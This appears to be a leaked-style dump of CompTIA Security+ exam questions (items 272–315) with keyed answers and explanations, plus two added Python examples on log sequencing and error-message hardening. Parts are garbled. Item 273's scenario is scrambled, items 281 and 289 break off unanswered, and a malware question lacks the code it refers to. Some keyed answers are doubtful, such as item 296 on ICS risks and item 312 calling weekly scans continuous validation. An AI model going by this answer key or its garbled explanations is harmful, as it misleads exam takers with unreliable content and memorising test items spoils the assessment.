References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://docs.microsoft.com/en-us/windows-server/administration/server-manager/view-event-logs
272.A company recently enhanced mobile device configuration by implementing a set of security
controls: biometrics, context-aware authentication, and full device encryption. Even with these settings in
place, an unattended phone was used by a malicious actor to access corporate data.
Which of the following additional controls should be put in place first?
A. GPS tagging
B. Remote wipe
C. Screen lock timer
D. SEAndroid
Answer: C
Explanation:
According to NIST Special Publication 1800-4B1, some of the security controls that can be used to
protect mobile devices include:
✑ Root and jailbreak detection: ensures that the security architecture for a mobile device has not been
compromised.
✑ Encryption: protects the data stored on the device and in transit from unauthorized access.
✑ Authentication: verifies the identity of the user and the device before granting access to enterprise
resources.
✑ Remote wipe: allows the organization to erase the data on the device in case of loss or theft.
✑ Screen lock timer: sets a time limit for the device to lock itself after a period of inactivity.
273.An employee's laptop was stolen last month. This morning, the was returned by the A cybersecurity
analyst retrieved laptop and has since cybersecurity incident checklist. Four incident handlers are
responsible for executing the checklist.
Which of the following best describes the process for evidence collection assurance?
A. Time stamp
B. Chain of custody
C. Admissibility
D. Legal hold
Answer: B
Explanation:
Chain of custody is a process that documents the chronological and logical sequence of custody, control,
transfer, analysis, and disposition of materials, including physical or electronic evidence. Chain of
custody is important to ensure the integrity and admissibility of evidence in legal proceedings. Chain of
custody can help evidence collection assurance by providing proof that the evidence has been handled
properly and has not been tampered with or contaminated.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.thoughtco.com/chain-of-custody-4589132
274.A security analyst receives an alert that indicates a user's device is displaying anomalous behavior.
The analyst suspects the device might be compromised.
Which of the following should the analyst do first?
A. Reboot the device
B. Set the host-based firewall to deny an incoming connection
C. Update the antivirus definitions on the device
D. Isolate the device
Answer: D
Explanation:
Isolating the device is the first thing that a security analyst should do if they suspect that a user’s device
might be compromised. Isolating the device means disconnecting it from the network or placing it in a
separate network segment to prevent further communication with potential attackers or malicious hosts.
Isolating the device can help contain the incident, limit the damage or data loss, preserve the evidence,
and facilitate the investigation and remediation.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://resources.infosecinstitute.com/topic/incident-response-process/
275.CORRECT TEXT
A new security engineer has started hardening systems. One of the hardening techniques the engineer
is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to
transfer files to the NAS, even though the data is still viewable from the users' PCs.
Which of the following is the MOST likely cause of this issue?
A. TFTP was disabled on the local hosts.
B. SSH was turned off instead of modifying the configuration file
C. Remote login was disabled in the networkd.conf instead of using the sshd.conf.
D. Network services are no longer running on the NAS.
Answer: B
Explanation:
Disabling remote logins to the NAS likely involved turning off SSH instead of modifying the configuration
file. This would prevent users from using SCP to transfer files to the NAS, even though the data is still
viewable from the users' PCs. Source: TechTarget
276.A network administrator needs to determine the sequence of a server farm's logs.
Which of the following should the administrator consider? (Select two).
A. Chain of custody
B. Tags
C. Reports
D. Time stamps
E. Hash values
F. Time offset
Answer: D,F
Explanation:
A server farm’s logs are records of events that occur on a group of servers that provide the same service
or function. Logs can contain information such as date, time, source, destination, message, error code,
and severity level. Logs can help administrators monitor the performance, security, and availability of the
servers and troubleshoot any issues.
To determine the sequence of a server farm’s logs, the administrator should consider the following
factors:
✑ Time stamps: Time stamps are indicators of when an event occurred on a server. Time stamps can
help administrators sort and correlate events across different servers based on chronological order.
However, time stamps alone may not be sufficient to determine the sequence of events if the servers
have different time zones or clock settings.
✑ Time offset: Time offset is the difference between the local time of a server and a reference time, such
as Coordinated Universal Time (UTC) or Greenwich Mean Time (GMT). Time offset can help
administrators adjust and synchronize the time stamps of different servers to a common reference time
and eliminate any discrepancies caused by time zones or clock settings.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://docs.microsoft.com/en-us/windows-server/administration/server-manager/view-event-logs
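Added example for questions 271 and 276 (not part of the dump's answer text): normalizing each server's time stamps to UTC using its reported offset, plus a measured clock skew, before sorting. The log format, host names and the 90-second skew on web2 are constructed for the example.

```python
"""
Order a server farm's logs by applying each server's UTC offset (and any
known clock skew) before sorting, instead of sorting raw local time stamps.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
import re

# Constructed sample: three servers, each writing local time with the UTC
# offset it reports. Sorted on local time alone, db1 (UTC+1) would appear
# last even though its event is not the latest.
SAMPLE_LOGS = """\
web1 2024-03-01 09:15:02 +0000 GET /login 200
web2 2024-03-01 04:14:40 -0500 GET /login 200
db1  2024-03-01 10:15:01 +0100 AUTH admin OK
web2 2024-03-01 04:16:10 -0500 POST /export 200
"""

# Per-host clock skew measured against an NTP reference (constructed):
# web2's clock runs 90 seconds fast, so 90 s is subtracted from its events.
CLOCK_SKEW = {"web2": timedelta(seconds=90)}

LINE_RE = re.compile(
    r"^(?P<host>\S+)\s+(?P<date>\d{4}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}:\d{2})"
    r"\s+(?P<offset>[+-]\d{4})\s+(?P<msg>.*)$"
)


@dataclass
class LogEvent:
    host: str
    local_time: datetime  # as written in the log, tz-aware with the server's offset
    utc_time: datetime    # normalized instant after offset and skew correction
    message: str


def parse_offset(text: str) -> timezone:
    """Turn '+0100' / '-0500' into a fixed-offset tzinfo."""
    sign = 1 if text[0] == "+" else -1
    hours, minutes = int(text[1:3]), int(text[3:5])
    return timezone(sign * timedelta(hours=hours, minutes=minutes))


def parse_line(line: str, skew=CLOCK_SKEW) -> LogEvent:
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparsable log line: {line!r}")
    tz = parse_offset(m["offset"])
    local = datetime.strptime(f"{m['date']} {m['time']}", "%Y-%m-%d %H:%M:%S").replace(tzinfo=tz)
    # Convert to the common reference (UTC), then remove this host's known skew.
    utc = local.astimezone(timezone.utc) - skew.get(m["host"], timedelta(0))
    return LogEvent(m["host"], local, utc, m["msg"])


def sequence_logs(text: str, skew=CLOCK_SKEW) -> list[LogEvent]:
    """Parse every non-empty line and return the events in true chronological order."""
    events = [parse_line(line, skew) for line in text.splitlines() if line.strip()]
    return sorted(events, key=lambda e: e.utc_time)


if __name__ == "__main__":
    for e in sequence_logs(SAMPLE_LOGS):
        print(e.utc_time.isoformat(), e.host, e.message)
```

Passing `skew={}` shows the order with offsets applied but no clock correction, which is the second-best approximation when skew has not been measured.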
277.Which of the following describes where an attacker can purchase DDoS or ransomware services?
A. Threat intelligence
B. Open-source intelligence
C. Vulnerability database
D. Dark web
Answer: D
Explanation:
The best option to describe where an attacker can purchase DDoS or ransomware services is the dark
web. The dark web is an anonymous, untraceable part of the internet where a variety of illicit activities
take place, including the purchase of DDoS and ransomware services. According to the CompTIA
Security+ SY0-601 Official Text Book, attackers can purchase these services anonymously and without
the risk of detection or attribution. Additionally, the text book recommends that organizations monitor the
dark web to detect any possible threats or malicious activity.
278.A company is concerned about individuals driving a car into the building to gain access.
Which of the following security controls would work BEST to prevent this from happening?
A. Bollard
B. Camera
C. Alarms
D. Signage
E. Access control vestibule
Answer: A
Explanation:
Bollards are posts designed to prevent vehicles from entering an area. They are usually made of steel or
concrete and are placed close together to make it difficult for vehicles to pass through. In addition to
preventing vehicles from entering an area, bollards can also be used to protect buildings and pedestrians
from ramming attacks. They are an effective and cost-efficient way to protect buildings and pedestrians
from unauthorized access.
279.CORRECT TEXT
A company recently added a DR site and is redesigning the network. Users at the DR site are having
issues browsing websites.
INSTRUCTIONS
Click on each firewall to do the following:
1. Deny cleartext web traffic
2. Ensure secure management protocols are used.
3. Resolve issues at the DR site.
The ruleset order cannot be modified due to outside constraints.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.
Answer:
In Firewall 1, HTTP inbound Action should be DENY. As shown below
280.A security team discovered a large number of company-issued devices with non-work-related
software installed.
Which of the following policies would most likely contain language that would prohibit this activity?
A. NDA
B. BPA
C. AUP
D. SLA
Answer: C
Explanation:
AUP stands for acceptable use policy, which is a document that defines the rules and guidelines for
using an organization’s network, systems, devices, and resources. An AUP typically covers topics such
as authorized and unauthorized activities, security requirements, data protection, user responsibilities,
and consequences for violations. An AUP can help prevent non-work-related software installation on
company-issued devices by clearly stating what types of software are allowed or prohibited, and what
actions will be taken if users do not comply with the policy.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.techopedia.com/definition/2471/acceptable-use-policy-aup
281.A company recently implemented a patch management policy; however, vulnerability scanners have
still been flagging several hosts, even after the completion of the patch process.
Which of the following is the most likely cause of the issue?
A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered.
C. Third-party applications are not being patched.
282.A user is trying to upload a tax document, which the corporate finance department requested, but a
security program is prohibiting the upload. A security analyst determines the file contains PII.
Which of the following steps can the analyst take to correct this issue?
A. Create a URL filter with an exception for the destination website.
B. Add a firewall rule to the outbound proxy to allow file uploads
C. Issue a new device certificate to the user's workstation.
D. Modify the exception list on the DLP to allow the upload
Answer: D
Explanation:
Data Loss Prevention (DLP) policies are used to identify and protect sensitive data, and often include a
list of exceptions that allow certain types of data to be uploaded or shared. By modifying the exception
list on the DLP, the security analyst can allow the tax document to be uploaded without compromising the
security of the system. (Reference: CompTIA Security+ SY0-601 Official Textbook, page 479-480)
283.A security administrator suspects there may be unnecessary services running on a server.
Which of the following tools will the administrator most likely use to confirm the suspicions?
A. Nmap
B. Wireshark
C. Autopsy
D. DNSEnum
Answer: A
Explanation:
Nmap is a tool that is used to scan IP addresses and ports in a network and to detect installed
applications. Nmap can help a security administrator determine the services running on a server by
sending various packets to the target and analyzing the responses. Nmap can also perform various
tasks such as OS detection, version detection, script scanning, firewall evasion, and vulnerability
scanning.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://nmap.org/
284.A security analyst is reviewing computer logs because a host was compromised by malware. After
the computer was infected, it displayed an error screen and shut down.
Which of the following should the analyst review first to determine more information?
A. Dump file
B. System log
C. Web application log
D. Security tool
Answer: A
Explanation:
A dump file is the first thing that a security analyst should review to determine more information about a
compromised device that displayed an error screen and shut down. A dump file is a file that contains a
snapshot of the memory contents of a device at the time of a system crash or error. A dump file can help
a security analyst analyze the cause and source of the crash or error, as well as identify any malicious
code or activity that may have triggered it.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/introduction-to-crash-dump-files
286.An employee used a corporate mobile device during a vacation. Multiple contacts were modified in
the device during the vacation.
Which of the following methods did the attacker use to insert the contacts without having physical access
to the device?
A. Jamming
B. Bluejacking
C. Disassociation
D. Evil twin
Answer: B
Explanation:
Bluejacking is the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as
mobile phones, PDAs or laptop computers. Bluejacking does not involve device hijacking, despite what
the name implies. The best answer to the question is B, Bluejacking, because it is a method that can
insert contacts without having physical access to the device.
287.Which of the following secure application development concepts aims to block verbose error
messages from being shown in a user’s interface?
A. OWASP
B. Obfuscation/camouflage
C. Test environment
D. Prevention of information exposure
Answer: D
Explanation:
Preventing information exposure is a secure application development concept that aims to block verbose
error messages from being shown in a user’s interface. Verbose error messages are detailed messages
that provide information about errors or exceptions that occur in an application. Verbose error messages
may reveal sensitive information about the application’s structure, configuration, logic, or data that could
be exploited by attackers. Therefore, preventing information exposure involves implementing proper
error handling mechanisms that display generic or user-friendly messages instead of verbose error
messages.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration
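Added example for question 287 (not from the dump): the same request handler written once with verbose errors returned to the caller and once with detail logged server-side under a reference id. The data-layer function, its error text and the internal host/path strings are constructed to show what a verbose message can leak.

```python
"""
Verbose vs. generic error responses for a request handler.

handle_verbose() returns the exception text and traceback to the client,
leaking a SQL fragment, an internal host name and a source path.
handle_hardened() logs that detail with a random reference id and returns
only a generic message, so the user can still report the failure.
"""
import logging
import secrets
import traceback

log = logging.getLogger("app")


def lookup_user(user_id: str) -> dict:
    """Constructed stand-in for a data layer; messages mimic a real driver's."""
    if user_id == "503":
        raise ConnectionError("connection to db1.internal:5432 refused")
    if not user_id.isdigit():
        raise ValueError(
            f"invalid input syntax for integer: '{user_id}' in SELECT * FROM users "
            f"(db host db1.internal, /srv/app/models/user.py)"
        )
    return {"id": int(user_id), "name": "alice"}


def handle_verbose(user_id: str) -> tuple[int, str]:
    """Before: error detail goes straight to the client (information exposure)."""
    try:
        user = lookup_user(user_id)
        return 200, f"user {user['name']}"
    except Exception as exc:
        return 500, f"Error: {exc}\n{traceback.format_exc()}"


def handle_hardened(user_id: str) -> tuple[int, str]:
    """After: detail is logged; the client gets a generic message plus a reference id."""
    try:
        user = lookup_user(user_id)
        return 200, f"user {user['name']}"
    except ValueError:
        # Caller's fault: say so without echoing the internal error text.
        return 400, "Invalid request."
    except Exception:
        ref = secrets.token_hex(8)
        log.exception("unhandled error, ref=%s", ref)  # full traceback stays server-side
        return 500, f"An internal error occurred. Reference: {ref}"


# Strings a reviewer would not want to see in any response body (constructed list).
SENSITIVE_MARKERS = ("SELECT", "/srv/", ".internal", "Traceback")


def leaks_internals(body: str) -> bool:
    """Crude response-body check usable in a unit test or a proxy rule."""
    return any(marker in body for marker in SENSITIVE_MARKERS)


if __name__ == "__main__":
    for handler in (handle_verbose, handle_hardened):
        status, body = handler("abc")
        print(handler.__name__, status, "leaks" if leaks_internals(body) else "clean")
```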
288.An email security vendor recently added a retroactive alert after discovering a phishing email had
already been delivered to an inbox.
Which of the following would be the best way for the security administrator to address this type of alert in
the future?
A. Utilize a SOAR playbook to remove the phishing message.
B. Manually remove the phishing emails when alerts arrive.
C. Delay all emails until the retroactive alerts are received.
D. Ingest the alerts into a SIEM to correlate with delivered messages.
Answer: A
Explanation:
One possible way to address this type of alert in the future is to use a SOAR (Security Orchestration,
Automation, and Response) playbook to automatically remove the phishing message from the inbox. A
SOAR playbook is a set of predefined actions that can be triggered by certain events or conditions. This
can help reduce the response time and human error in dealing with phishing alerts.
289.A security administrator is managing administrative access to sensitive systems with the following
requirements:
• Common login accounts must not be used for administrative duties.
• Administrative accounts must be temporal in nature.
290.A global pandemic is forcing a private organization to close some business units and reduce staffing
at others.
Which of the following would be best to help the organization's executives determine their next course of
action?
A. An incident response plan
B. A communication plan
C. A disaster recovery plan
D. A business continuity plan
Answer: D
Explanation:
A business continuity plan (BCP) is a document that outlines how an organization will continue its critical
functions during and after a disruptive event, such as a natural disaster, pandemic, cyberattack, or power
outage. A BCP typically covers topics such as business impact analysis, risk assessment, recovery
strategies, roles and responsibilities, communication plan, testing and training, and maintenance and
review. A BCP can help the organization’s executives determine their next course of action by providing
them with a clear framework and guidance for managing the crisis and resuming normal operations.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.ready.gov/business-continuity-plan
291.A security administrator needs to block a TCP connection using the corporate firewall. Because this
connection is potentially a threat, the administrator does not want to send back an RST.
Which of the following actions in the rule would work best?
A. Drop
B. Reject
C. Log alert
D. Permit
Answer: A
Explanation:
The difference between drop and reject in a firewall is that the drop target sends nothing to the source,
while the reject target sends a reject response to the source. This can affect how the source handles the
connection attempt and how fast port scanning proceeds. The best action to block a TCP connection
using the corporate firewall is therefore A. Drop, because it does not send back an RST packet, and it
may slow down port scanning and protect against DoS attacks.
292.Which of the following would a security analyst use to determine if other companies in the same
sector have seen similar malicious activity against their systems?
A. Vulnerability scanner
B. Open-source intelligence
C. Packet capture
D. Threat feeds
Answer: D
Explanation:
Threat feeds, also known as threat intelligence feeds, are a source of information about current and
emerging threats, vulnerabilities, and malicious activities targeting organizations. Security analysts use
threat feeds to gather information about attacks and threats targeting their industry or sector. These
feeds are typically provided by security companies, research organizations, or industry-specific groups.
By using threat feeds, analysts can identify trends, patterns, and potential threats that may target their
own organization, allowing them to take proactive steps to protect their systems.
References:
1. CompTIA Security+ Certification Exam Objectives (SY0-601):
https://www.comptia.jp/pdf/Security%2B%20SY0-601%20Exam%20Objectives.pdf
2. SANS Institute: Threat Intelligence: What It Is, and How to Use It Effectively:
https://www.sans.org-room/whitepapers/analyst/threat-intelligence-is-effectively-36367
293.An upcoming project focuses on secure communications and trust between external parties.
Which of the following security components will need to be considered to ensure a chosen trust provider
is used and the selected option is highly scalable?
A. Self-signed certificate
B. Certificate attributes
C. Public key Infrastructure
D. Domain validation
Answer: C
Explanation:
PKI is a security technology that enables secure communication between two parties by using
cryptographic functions. It consists of a set of components that are used to create, manage, distribute,
store, and revoke digital certificates. PKI provides a secure way to exchange data between two parties,
as well as a trust provider to ensure that the data is not tampered with. It also helps to create a highly
scalable solution, as the same certificate can be used for multiple parties.
According to the CompTIA Security+ Study Guide, “PKI is a technology used to secure communications
between two external parties. PKI is based on the concept of digital certificates, which are used to
authenticate the sender and recipient of a message. PKI provides a trust provider to ensure that the
digital certificate is valid and has not been tampered with. It also provides a scalable solution, as multiple
parties can use the same certificate.”
294.A security investigation revealed that malicious software was installed on a server using a server
administrator's credentials. During the investigation the server administrator explained that Telnet was
regularly used to log in.
Which of the following most likely occurred?
A. A spraying attack was used to determine which credentials to use
B. A packet capture tool was used to steal the password
C. A remote-access Trojan was used to install the malware
D. A directory attack was used to log in as the server administrator
Answer: B
Explanation:
Telnet is an insecure protocol that transmits data in cleartext over the network. This means that anyone
who can intercept the network traffic can read the data, including the username and password of the
server administrator. A packet capture tool is a software or hardware device that can capture and
analyze network packets. An attacker can use a packet capture tool to steal the password and use it to
install malicious software on the server.
References: https://www.comptia.org/content/guides/what-is-network-security
295.A company would like to move to the cloud. The company wants to prioritize control and security
over cost and ease of management.
Which of the following cloud models would best suit this company's priorities?
A. Public
B. Hybrid
C. Community
D. Private
Answer: D
Explanation:
A private cloud model would best suit the company's priorities of control and security over cost and ease
of management. In a private cloud, the infrastructure is dedicated to a single organization, providing
greater control over the environment and the ability to implement strict security measures. This is in
contrast to public, community, or hybrid cloud models, where resources are shared among multiple
organizations, potentially compromising control and security. While private clouds can be more
expensive and more difficult to manage, they provide the highest level of control and security for the company.
Reference:
- CompTIA Security+ Certification Exam Objectives (SY0-601), Section 3.2: "Explain the importance of
secure staging deployment concepts."
- Cisco: Private Cloud - https://www.cisco.com/c/en/us/solutions/cloud/private-cloud.html
296.Which of the following is a security implication of newer ICS devices that are becoming more
common in corporations?
A. Devices with cellular communication capabilities bypass traditional network security controls
B. Many devices do not support elliptic-curve encryption algorithms due to the overhead they require.
C. These devices often lack privacy controls and do not meet newer compliance regulations
D. Unauthorized voice and audio recording can cause loss of intellectual property
Answer: D
Explanation:
Industrial control systems (ICS) are devices that monitor and control physical processes, such as power
generation, manufacturing, or transportation. Newer ICS devices may have voice and audio capabilities
that can be exploited by attackers to eavesdrop on sensitive conversations or capture confidential
information. This can result in the loss of intellectual property or trade secrets.
References: https://www.comptia.org/content/guides/what-is-industrial-control-system-security
297.A small, local company experienced a ransomware attack. The company has one web-facing server
and a few workstations. Everything is behind an ISP firewall. A single web-facing server is set up on the
router to forward all ports so that the server is viewable from the internet. The company uses an older
version of third-party software to manage the website. The assets were never patched.
Which of the following should be done to prevent an attack like this from happening again? (Select
three).
A. Install DLP software to prevent data loss.
B. Use the latest version of software.
C. Install a SIEM device.
D. Implement MDM.
E. Implement a screened subnet for the web server.
F. Install an endpoint security solution.
G. Update the website certificate and revoke the existing ones.
H. Deploy additional network sensors.
Answer: B,E,F
298.A desktop computer was recently stolen from a desk located in the lobby of an office building.
Which of the following would be the best way to secure a replacement computer and deter future theft?
A. Installing proximity card readers on all entryway doors
B. Deploying motion sensor cameras in the lobby
C. Encrypting the hard drive on the new desktop
D. Using cable locks on the hardware
Answer: D
Explanation:
Using cable locks on the hardware can be an effective way to secure a desktop computer and deter
future theft. Cable locks are physical security devices that attach to the computer case and to a nearby
stationary object, such as a desk or wall. This makes it more difficult for a thief to remove the computer
without damaging it or attracting attention.
Installing proximity card readers on all entryway doors can enhance physical security by limiting access
to authorized individuals. Deploying motion sensor cameras in the lobby can also help deter theft by
capturing images of any unauthorized individuals entering the premises or attempting to steal the
computer. Encrypting the hard drive on the replacement desktop can also help protect sensitive data in
the event of theft, but it does not provide physical security for the device itself.
299.A security administrator is integrating several segments onto a single network. One of the segments,
which includes legacy devices, presents a significant amount of risk to the network.
Which of the following would allow users to access the legacy devices without compromising the
security of the entire network?
A. NIDS
B. MAC filtering
C. Jump server
D. IPSec
E. NAT gateway
Answer: C
Explanation:
A jump server is a device that acts as an intermediary between users and other devices on a network. A
jump server can provide a secure and controlled access point to the legacy devices without exposing
them directly to the network. A jump server can also enforce authentication, authorization, logging, and
auditing policies.
300.The management team has requested that the security team implement 802.1X into the existing
wireless network setup.
The following requirements must be met:
• Minimal interruption to the end user
• Mutual certificate validation
Which of the following authentication protocols would meet these requirements?
A. EAP-FAST
B. PSK
C. EAP-TTLS
D. EAP-TLS
Answer: D
Explanation:
EAP-TLS (Extensible Authentication Protocol - Transport Layer Security) is an authentication protocol
that uses certificates to provide mutual authentication between the client and the authentication server. It
also allows for the encryption of user credentials, making EAP-TLS a secure and reliable authentication
protocol. According to the CompTIA Security+ SY0-601 Official Text Book, EAP-TLS is well-suited for
wireless networks due to its mutual authentication capabilities and its ability to securely store credentials.
It is also the preferred authentication protocol for 802.1X wireless networks.
301.A company owns a public-facing e-commerce website. The company outsources credit card
transactions to a payment company.
Which of the following BEST describes the role of the payment company?
A. Data controller
B. Data custodian
C. Data owners
D. Data processor
Answer: D
Explanation:
A data processor is an organization that processes personal data on behalf of a data controller. In this
scenario, the company that owns the e-commerce website is the data controller, as it determines the
purposes and means of processing personal data (e.g. credit card information). The payment company is
a data processor, as it processes personal data on behalf of the e-commerce company (i.e. it processes
credit card transactions).
Reference: CompTIA Security+ Study Guide (SY0-601) 7th Edition by Emmett Dulaney, Chuck Easttom
303.Which of the following is a solution that can be used to stop a disgruntled employee from copying
confidential data to a USB drive?
A. DLP
B. TLS
C. AV
D. IDS
Answer: A
Explanation:
DLP stands for data loss prevention, which is a set of tools and processes that aim to prevent
unauthorized access, use, or transfer of sensitive data. DLP can help mitigate the risk of data exfiltration
by disgruntled employees or external attackers by monitoring and controlling data flows across
endpoints, networks, and cloud services. DLP can also detect and block attempts to copy, transfer, or
upload sensitive data to a USB drive or other removable media based on predefined policies and rules.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.microsoft.com/en-us/security/business/security-101/what-is-data-loss-prevention-dlp
Which of the following types of malware MOST likely contains this snippet?
A. Logic bomb
B. Keylogger
C. Backdoor
D. Ransomware
Answer: A
Explanation:
A logic bomb is a type of malware that executes malicious code when certain conditions are met. A logic
bomb can be triggered by various events, such as a specific date or time, a user action, a system
configuration change, or a command from an attacker. A logic bomb can perform various malicious
actions, such as deleting files, encrypting data, displaying messages, or launching other malware.
The snippet of Python code shows a logic bomb that executes a function called delete_all_files() when
the current date is December 25th. The code uses the datetime module to get the current date and
compare it with a predefined date object. If the condition is true, the code calls the delete_all_files()
function, which presumably deletes all files on the system.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.kaspersky.com/resource-center/definitions/logic-bomb
305.A large bank with two geographically dispersed data centers is concerned about major power
disruptions at both locations. Every day each location experiences very brief outages that last for a few
seconds. However, during the summer a high risk of intentional under-voltage events that could last up
to an hour exists, particularly at one of the locations near an industrial smelter.
Which of the following is the BEST solution to reduce the risk of data loss?
A. Dual supply
B. Generator
C. PDU
D. Daily backups
Answer: B
Explanation:
A generator will provide uninterrupted power to the data centers, ensuring that they are not affected by
any power disruptions, intentional or otherwise. This is more reliable than a dual supply or a PDU, and
more effective than daily backups, which would not be able to protect against an outage lasting an hour.
306.A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user
can reach the internet but cannot access shared folders or other network resources.
Which of the following types of attacks is the user MOST likely experiencing?
A. Bluejacking
B. Jamming
C. Rogue access point
D. Evil twin
Answer: D
Explanation:
An evil twin attack is when an attacker sets up a fake Wi-Fi network that looks like a legitimate network,
but is designed to capture user data that is sent over the network. In this case, the user's laptop is
constantly disconnecting and reconnecting to the Wi-Fi network, indicating that it is connecting to the
fake network instead of the legitimate one. Once the user connects to the fake network, they are unable
to access shared folders or other network resources, as those are only available on the legitimate
network.
307.A data center has experienced an increase in under-voltage events following electrical grid
maintenance outside the facility. These events are leading to occasional losses of system availability.
Which of the following would be the most cost-effective solution for the data center to implement?
A. Uninterruptible power supplies with battery backup
B. Managed power distribution units to track these events
C. A generator to ensure consistent, normalized power delivery
D. Dual power supplies to distribute the load more evenly
Answer: A
Explanation:
Uninterruptible power supplies with battery backup would be the most cost-effective solution for the data
center to implement to prevent under-voltage events following electrical grid maintenance outside the
facility. An uninterruptible power supply (UPS) is a device that provides emergency power to a load when
the main power source fails or drops below an acceptable level. A UPS with battery backup can help
prevent under-voltage events by switching to battery power when it detects a voltage drop or outage in
the main power source. A UPS with battery backup can also protect the data center equipment from
power surges or spikes.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.apc.com/us/en/faqs/FA158852/
309.A company received a "right to be forgotten" request. To legally comply, the company must remove data related
to the requester from its systems.
Which of the following is the company most likely complying with?
A. NIST CSF
B. GDPR
C. PCI DSS
D. ISO 27001
Answer: B
Explanation:
GDPR stands for General Data Protection Regulation, which is a law that regulates data protection and
privacy in the European Union (EU) and the European Economic Area (EEA). GDPR also applies to the
transfer of personal data outside the EU and EEA areas. GDPR grants individuals the right to request the
deletion or removal of their personal data from an organization’s systems under certain circumstances.
This right is also known as the “right to be forgotten” or the “right to erasure”. An organization that
receives such a request must comply with it within a specified time frame, unless there are legitimate
grounds for retaining the data.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://gdpr-info.eu/issues/right-to-be-forgotten/
310.CORRECT TEXT
A systems administrator needs to install a new wireless network for authenticated guest access. The
wireless network should support 802.1X using the most secure encryption and protocol available.
Perform the following steps:
1. Configure the RADIUS server.
2. Configure the WiFi controller.
3. Preconfigure the client for an incoming guest. The guest AD credentials are:
User: guest01
Password: guestpass
Answer:
Wifi Controller
SSID: CORPGUEST
SHARED KEY: Secret
AAA server IP: 192.168.1.20
PSK: Blank
Authentication type: WPA2-EAP-PEAP-MSCHAPv2
Controller IP: 192.168.1.10
Radius Server
Shared Key: Secret
Client IP: 192.168.1.10
Authentication Type: Active Directory
Server IP: 192.168.1.20
Wireless Client
SSID: CORPGUEST
Username: guest01
Userpassword: guestpass
PSK: Blank
Authentication type: WPA2-Enterprise
311.A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and
operated by an outdated and unsupported specialized Windows OS.
Which of the following is most likely preventing the IT manager at the hospital from upgrading the
specialized OS?
A. The time needed for the MRI vendor to upgrade the system would negatively impact patients.
B. The MRI vendor does not support newer versions of the OS.
C. Changing the OS breaches a support SLA with the MRI vendor.
D. The IT team does not have the budget required to upgrade the MRI scanner.
Answer: B
Explanation:
This option is the most likely reason for preventing the IT manager at the hospital from upgrading the
specialized OS. The MRI scanner is a complex and sensitive device that requires a specific OS to control
and operate it. The MRI vendor may not have developed or tested newer versions of the OS for
compatibility and functionality with the scanner. Upgrading the OS without the vendor’s support may
cause the scanner to malfunction or stop working altogether.
312.A security administrator performs weekly vulnerability scans on all cloud assets and provides a
detailed report.
Which of the following describes the administrator's activities?
A. Continuous deployment
B. Continuous integration
C. Continuous validation
D. Continuous monitoring
Answer: C
Explanation:
Continuous validation is a process that involves performing regular and automated tests to verify the
security and functionality of a system or an application. Continuous validation can help identify and
remediate vulnerabilities, bugs, or misconfigurations before they cause any damage or disruption. The
security administrator’s activities of performing weekly vulnerability scans on all cloud assets and
providing a detailed report are examples of continuous validation.
313.Which of the following social engineering attacks best describes an email that is primarily intended
to mislead recipients into forwarding the email to others?
A. Hoaxing
B. Pharming
C. Watering-hole
D. Phishing
Answer: A
Explanation:
Hoaxing is a type of social engineering attack that involves sending false or misleading information via
email or other means to trick recipients into believing something that is not true. Hoaxing emails often
contain a request or an incentive for the recipients to forward the email to others, such as a warning of a
virus, a promise of a reward, or a petition for a cause. The goal of hoaxing is to spread misinformation,
cause panic, waste resources, or damage reputations.
A hoaxing email is primarily intended to mislead recipients into forwarding the email to others, which can
increase the reach and impact of the hoax.
314.After installing a patch on a security appliance, an organization realized a massive data exfiltration
had occurred.
Which of the following describes the incident?
A. Supply chain attack
B. Ransomware attack
C. Cryptographic attack
D. Password attack
Answer: A
Explanation:
A supply chain attack is a type of attack that involves compromising a trusted third-party provider or
vendor and using their products or services to deliver malware or gain access to the target organization.
The attacker can exploit the trust and dependency that the organization has on the provider or vendor
and bypass their security controls. In this case, the attacker may have tampered with the patch for the
security appliance and used it to exfiltrate data from the organization.
315.Which of the following is the BEST reason to maintain a functional and effective asset management
policy that aids in ensuring the security of an organization?
A. To provide data to quantify risk based on the organization's systems
B. To keep all software and hardware fully patched for known vulnerabilities
C. To only allow approved, organization-owned devices onto the business network
D. To standardize by selecting one laptop model for all users in the organization
Answer: A
Explanation:
An effective asset management policy helps an organization understand and manage the systems,
hardware, and software it uses, and how they are used, including their vulnerabilities and risks. This
information is crucial for accurately identifying and assessing risks to the organization, and making
